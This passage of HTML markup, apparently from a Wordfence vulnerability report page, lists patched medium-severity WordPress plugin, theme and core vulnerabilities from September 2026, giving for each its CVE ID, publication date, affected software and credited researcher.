		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74f6667f-fa30-454f-a100-cfdb50d47026" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bfba54f-961d-4889-9272-0020c9fa0801" target="_blank" rel="noopener">Search Atlas SEO &lt;= 2.6.23 &#8211; Missing Authorization to Authenticated (Subscriber+) Site-Wide Option Modification via &#8216;metasync_post_types&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15947" target="_blank" rel="noopener noreferrer">							CVE-2026-15947						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metasync" target="_blank" rel="noopener">Search Atlas SEO – OTTO AI SEO Automation for WordPress</a> <span class="wfvr-software-slug">[metasync]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bfba54f-961d-4889-9272-0020c9fa0801" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/56d839b0-b29d-4299-af77-1ce97a5925f6" target="_blank" rel="noopener">Search Atlas SEO &lt;= 2.6.23 &#8211; Missing Authorization to Authenticated (Subscriber+) Whitelabel Password Modification via handle_whitelabel_password_early Function</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15946" target="_blank" rel="noopener noreferrer">							CVE-2026-15946						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metasync" target="_blank" rel="noopener">Search Atlas SEO – OTTO AI SEO Automation for WordPress</a> <span class="wfvr-software-slug">[metasync]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/56d839b0-b29d-4299-af77-1ce97a5925f6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fd58af7-e8ef-4518-bed8-4e20c8e61db7" target="_blank" rel="noopener">SEO Booster &lt;= 7.4.7 &#8211; Authenticated (Subscriber+) Missing Authorization to Arbitrary Options Modification via handle_oauth_callback()</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15660" target="_blank" rel="noopener noreferrer">							CVE-2026-15660						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-booster" target="_blank" rel="noopener">SEO Booster</a> <span class="wfvr-software-slug">[seo-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fd58af7-e8ef-4518-bed8-4e20c8e61db7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/515c5d34-19d8-4518-a127-35eb334be82c" target="_blank" rel="noopener">Seraphinite Accelerator &lt;= 2.29.23 &#8211; Authenticated (Subscriber+) Full Admin Area Denial of Service</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87828" target="_blank" rel="noopener noreferrer">							CVE-2026-87828						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seraphinite-accelerator" target="_blank" rel="noopener">Seraphinite Accelerator</a> <span class="wfvr-software-slug">[seraphinite-accelerator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/angel-ps" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c3ef45be20d7341d9a6867bd0a4c8a2f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c3ef45be20d7341d9a6867bd0a4c8a2f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/angel-ps" target="_blank" rel="noopener">Ángel PS</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/515c5d34-19d8-4518-a127-35eb334be82c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5182ac01-1d60-4bf6-ba70-cb364bfde519" target="_blank" rel="noopener">Sign-up Sheets &lt;= 2.3.0 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92410" target="_blank" rel="noopener noreferrer">							CVE-2026-92410						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sign-up-sheets" target="_blank" rel="noopener">Sign-up Sheets</a> <span class="wfvr-software-slug">[sign-up-sheets]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5182ac01-1d60-4bf6-ba70-cb364bfde519" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8af4f5b3-498a-4543-ad08-2140f6d51562" target="_blank" rel="noopener">Simple Membership &lt;= 4.8.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74000" target="_blank" rel="noopener noreferrer">							CVE-2026-74000						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-membership" target="_blank" rel="noopener">Simple Membership</a> <span class="wfvr-software-slug">[simple-membership]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8af4f5b3-498a-4543-ad08-2140f6d51562" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/672a7943-1b29-4a4f-a3f5-191fd9c5645c" target="_blank" rel="noopener">Subscriptions for WooCommerce &lt;= 2.0.2 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87860" target="_blank" rel="noopener noreferrer">							CVE-2026-87860						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">Subscriptions for WooCommerce</a> <span class="wfvr-software-slug">[subscriptions-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/672a7943-1b29-4a4f-a3f5-191fd9c5645c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/98d9b95f-7ea5-4650-8a19-0b257efdf776" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.7 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85572" target="_blank" rel="noopener noreferrer">							CVE-2026-85572						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shirshak" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/99734a20388f02c119e5f829dc282f10.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="99734a20388f02c119e5f829dc282f10"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shirshak" target="_blank" rel="noopener">Shirshak</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/98d9b95f-7ea5-4650-8a19-0b257efdf776" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e23fcd0-62b4-460d-9b64-8adbf14bf820" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.8 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion via &#8216;lesson_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88944" target="_blank" rel="noopener noreferrer">							CVE-2026-88944						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/eunho-kim-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/040569380c3a22465aca62038c02c432.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="040569380c3a22465aca62038c02c432"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/eunho-kim-2" target="_blank" rel="noopener">EUNHO KIM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e23fcd0-62b4-460d-9b64-8adbf14bf820" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2aeb5f28-00d3-45f3-846f-01ba99c959af" target="_blank" rel="noopener">Tutor LMS 2.7.1  &#8211; 4.0.7 &#8211; REST API Authentication Confusion</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85569" target="_blank" rel="noopener noreferrer">							CVE-2026-85569						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2aeb5f28-00d3-45f3-846f-01ba99c959af" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa857dd6-be6b-45d6-a7f2-ffc2012332e7" target="_blank" rel="noopener">Unbounce Landing Pages &lt;= 1.1.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85574" target="_blank" rel="noopener noreferrer">							CVE-2026-85574						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unbounce" target="_blank" rel="noopener">Unbounce Landing Pages</a> <span class="wfvr-software-slug">[unbounce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/furkan-arslan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a895eb6a51534d63fc655b6bfbd8d88e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a895eb6a51534d63fc655b6bfbd8d88e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/furkan-arslan" target="_blank" rel="noopener">Furkan Arslan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa857dd6-be6b-45d6-a7f2-ffc2012332e7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2b1751f0-d385-43f5-bf90-82479a9c6694" target="_blank" rel="noopener">VW Writer Blog &lt;= 1.3.8 &#8211; Missing Authorization to Authenticated (Subscriber+) Theme Settings Reset</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2278" target="_blank" rel="noopener noreferrer">							CVE-2026-2278						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/vw-writer-blog" target="_blank" rel="noopener">VW Writer Blog</a> <span class="wfvr-software-slug">[vw-writer-blog]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2b1751f0-d385-43f5-bf90-82479a9c6694" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b54af5b0-d79a-4fb2-965f-d3ff4956dc5a" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Authenticated (Author+) Information Exposure via attachment_submitbox_metadata()</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hdwsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/702cb979a155465bdbe1e65251943e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="702cb979a155465bdbe1e65251943e3e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hdwsec" target="_blank" rel="noopener">HDWSec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b54af5b0-d79a-4fb2-965f-d3ff4956dc5a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b8d4431-ac72-45a2-b4a1-19690946d0ee" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Authenticated (Author+) Missing Authorization to Comment/Note Reparenting via REST API</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/viridis" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/viridis" target="_blank" rel="noopener">viridis</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b8d4431-ac72-45a2-b4a1-19690946d0ee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83597e50-1992-4171-b24e-b14f55be6e4c" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Authenticated (Contributor+) Information Exposure via Sample Permalink AJAX Actions</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
